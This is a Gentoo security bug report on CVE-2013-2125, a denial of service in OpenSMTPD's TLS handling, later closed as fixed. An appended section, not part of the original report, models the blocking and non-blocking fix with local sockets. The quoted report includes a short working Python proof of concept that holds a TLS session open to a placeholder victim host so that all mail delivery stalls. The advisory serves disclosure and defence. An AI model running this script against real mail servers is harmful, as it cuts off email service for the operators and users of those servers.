Bug 470610 (CVE-2013-2125) - mail-mta/opensmtpd: Denial of Service in the TLS support (CVE-2013-2125)
Summary: mail-mta/opensmtpd: Denial of Service in the TLS support (CVE-2013-2125)
Status: RESOLVED FIXED
Alias: CVE-2013-2125
Product: Gentoo Security
Classification: Unclassified
Component: Vulnerabilities
Hardware: All Linux
Importance: Normal minor
Assignee: Gentoo Security
URL: http://www.openwall.com/lists/oss-sec...
Whiteboard: B3 [glsa]
Reported: 2013-05-19 08:31 UTC by Agostino Sarubbo
Modified: 2014-09-10 01:11 UTC
Description Agostino Sarubbo gentoo-dev 2013-05-19 08:31:39 UTC
From ${URL} :

The SSL handling in the latest OpenSMTPD (5.3.1) misconfigures its
sockets in blocking mode, allowing an attacker to prevent all mail
delivery simply by holding a socket open.

I discovered this accidentally, as I noticed my HP printer's smtp
client would keep the connection indefinitely open after an
unsuccessful authentication attempt, causing no more mail to be
delivered until I SIGKILL'd my smtpd process or unplugged my printer.

The following reproduces the attack trivially:

    #!/usr/bin/env python2
    import smtplib
    import time
    print "[+] Connecting to server and initiating TLS"
    smtp = smtplib.SMTP("mail.some-vitim-host.blah", 587)
    smtp.starttls()
    print "[+] No clients will be able to connect as long as this remains open."
    time.sleep(100000000)

Apparently this was fixed recently upstream, noting "evil client" in
the commit message:
http://git.zx2c4.com/OpenSMTPD/commit/?id=38b26921bad5fe24ad747bf9d591330d683728b0

A snapshot has been posted to http://www.opensmtpd.org/archives/ , but
no patch release has yet been made.


@maintainer(s): after the bump, in case we need to stabilize the package, please say explicitly if it is ready for the stabilization or not.
Comment 1 GLSAMaker/CVETool Bot gentoo-dev 2014-08-19 22:56:38 UTC
CVE-2013-2125 (http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2125):
  OpenSMTPD before 5.3.2 does not properly handle SSL sessions, which allows
  remote attackers to cause a denial of service (connection blocking) by
  keeping a connection open.
Comment 2 Yury German Gentoo Infrastructure gentoo-dev 2014-09-10 01:11:53 UTC
As per the opensmtpd page this looks to be fixed in version:

OpenSMTPD 5.3.1 Security Advisories

These are the OpenSMTPD 5.3.1 advisories -- all these problems are solved in our repository as well as in newer snapshots and releases.

May 16, 2013: OpenSMTPD's SSL layer has a bug in the IO events handler which can cause an evil client or server to hang all active SSL sessions until they timeout, causing a DoS in smtp and transfer processes.

https://www.opensmtpd.org/security.html

Closing the bug as resolved as we do not have earlier versions in tree other than 5.4.1. If I am mistaken please advise and we will address.

Adding to master GLSA for 2013.
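
Added example, not part of the original bug report and not OpenSMTPD code: a small Python model of the failure the report describes, where a single-process event loop does a blocking read and one silent peer stalls every other session, next to the non-blocking form with an idle timeout. It uses local `socketpair()` streams instead of TLS; `run_loop`, the peer names and the timeout values are assumptions made for the illustration.

```python
import selectors
import socket
import time

def run_loop(blocking, idle_timeout=0.2, run_for=1.0):
    """Added demo, not OpenSMTPD code. Returns (served, evicted) peer names."""
    sel, peers = selectors.DefaultSelector(), {}
    # Constructed input: "stalled" sends half a line, "good" a complete one.
    for order, (name, data) in enumerate([("stalled", b"EHLO par"),
                                          ("good", b"EHLO good\r\n")]):
        srv, cli = socket.socketpair()
        cli.sendall(data)
        srv.settimeout(run_for if blocking else 0)  # timeout bounds the demo
        sel.register(srv, selectors.EVENT_READ, (order, name))
        peers[srv] = [cli, b"", time.monotonic()]
    served, evicted, deadline = [], [], time.monotonic() + run_for

    def finish(sock, bucket):
        bucket.append(sel.get_key(sock).data[1])
        sel.unregister(sock)
        peers.pop(sock)[0].close()
        sock.close()

    while peers and time.monotonic() < deadline:
        # Worst-case ordering: the stalled peer is handled first.
        for key, _ in sorted(sel.select(0.05), key=lambda e: e[0].data):
            sock, st = key.fileobj, peers[key.fileobj]
            try:
                chunk = sock.recv(1024)
                while blocking and chunk and b"\n" not in st[1] + chunk:
                    st[1] += chunk
                    chunk = sock.recv(1024)  # every other peer waits here
            except BlockingIOError:
                continue
            except socket.timeout:  # demo bound hit while stuck in recv
                deadline = 0.0
                break
            st[1], st[2] = st[1] + chunk, time.monotonic()
            if b"\n" in st[1]:
                sock.sendall(b"250 ok\r\n")
                finish(sock, served)
            elif not chunk:
                finish(sock, [])  # peer closed mid-line
        for sock, st in list(peers.items()):
            if not blocking and time.monotonic() - st[2] > idle_timeout:
                finish(sock, evicted)
    for sock in list(peers):
        finish(sock, [])
    sel.close()
    return served, evicted
```

With `blocking=True` the well-behaved peer is never answered; with `blocking=False` it is answered at once and the silent peer is dropped after `idle_timeout`.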